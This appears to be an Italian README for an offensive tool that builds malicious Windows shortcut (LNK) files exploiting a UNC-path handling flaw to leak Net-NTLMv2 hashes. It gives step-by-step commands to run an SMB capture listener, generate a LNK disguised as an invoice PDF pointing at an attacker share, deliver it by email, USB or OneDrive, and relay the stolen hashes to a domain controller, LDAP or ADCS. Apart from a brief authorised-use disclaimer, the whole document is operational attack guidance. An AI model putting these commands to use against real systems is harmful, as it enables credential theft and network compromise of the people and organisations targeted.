
Genera file LNK dannosi per estorcere hash Net-NTLMv2 tramite la gestione UNC della Shell di Windows, con listener SMB personalizzato e integrazione relay per operazioni di red team autorizzate.
Disclaimer
Questo strumento è destinato esclusivamente a red teaming autorizzato e penetration testing.
L'uso non autorizzato contro sistemi senza permesso esplicito è illegale.
Usalo a tuo rischio. L'autore non si assume alcuna responsabilità per usi impropri o danni.
Descrizione
Coercizione di hash NTLMv2 tramite bypass incompleto della protezione Shell di Windows (CVE-2026-32202). Genera file LNK appositamente realizzati che forzano l'autenticazione SMB/UNC all'apertura o all'anteprima in Esplora file. A bassa interazione, funziona su sistemi patchati dove la correzione di aprile 2026 è risultata insufficiente. Utilizzato attivamente in engagement.
Caratteristiche principali
Cosa fa l'exploit
Lo strumento crea un .LNK realizzato ad hoc che abusa della gestione dei percorsi UNC da parte della Shell in Target + IconEnvironmentDataBlock / strutture ExtraData. Quando la vittima sfoglia la cartella o passa il mouse/anteprima il file, la Shell di Windows avvia una connessione SMB verso l'UNC controllato dall'attaccante, facendo trapelare l'hash Net-NTLMv2 della macchina/utente. Nessuna esecuzione di codice sul target - coercizione delle credenziali per relay o cracking.
Perché è utile
Dipendenze
Installazione: pip install -r requirements.txt
Utilizzo
# 1. Avvia il server di cattura (host attaccante)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt
# 2. Genera il LNK dannoso
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"
# Opzionale: modalità stabile o bypass
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"
# 3. Consegna il LNK (USB, condivisione, allegato email, OneDrive, ecc.)
# 4. Attendi l'hash nel terminale + file. Esempio di relay:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# oppure relay LDAP per RBCD, HTTP per certificati ADCS, ecc.
Exploit
Limitazioni
Causa principale (breve)
Correzione incompleta nella sanificazione dei percorsi UNC della Shell di Windows e nell'elaborazione dei blocchi ExtraData per la risoluzione di icone/target LNK. Il meccanismo di protezione pensato per bloccare lo spoofing di rete non autorizzato attiva comunque l'autenticazione NTLM durante l'enumerazione del namespace della Shell.